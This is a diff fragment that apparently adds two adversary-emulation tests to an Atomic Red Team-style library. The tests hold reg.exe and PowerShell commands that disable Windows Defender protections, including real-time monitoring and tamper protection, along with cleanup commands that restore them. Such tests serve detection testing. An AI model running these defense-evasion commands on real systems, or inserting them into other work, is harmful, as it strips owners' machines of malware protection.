+          Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 0\nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
+          \"SpynetReporting\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
+          Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
+          -Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          -Name \"TamperProtection\"  -Value 1\nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
+          defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
+          -Value 1 \n"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/T1562.001/T1562.001.md

@@ -110,6 +110,10 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar
 
 - [Atomic Test #47 - Tamper with Defender ATP on Linux/MacOS](#atomic-test-47---tamper-with-defender-atp-on-linuxmacos)
 
+- [Atomic Test #48 - Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48---tamper-with-windows-defender-registry---regexe)
+
+- [Atomic Test #49 - Tamper with Windows Defender Registry - Powershell](#atomic-test-49---tamper-with-windows-defender-registry---powershell)
+
 
 <br/>
 
@@ -1970,4 +1974,136 @@ sudo mdatp config real-time-protection --value enabled
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #48 - Tamper with Windows Defender Registry - Reg.exe
+Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1f6743da-6ecc-4a93-b03f-dc357e4b313f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul 
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul 
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
+reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #49 - Tamper with Windows Defender Registry - Powershell
+Disable Windows Defender by tampering with windows defender registry through powershell
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a72cfef8-d252-48b3-b292-635d332625c3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1  
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0 
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0 
+Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 0 
+Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0 
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0  
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1 
+Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1 
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1 
+Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 1
+Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1 
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
+```
+
+
+
+
+
 <br/>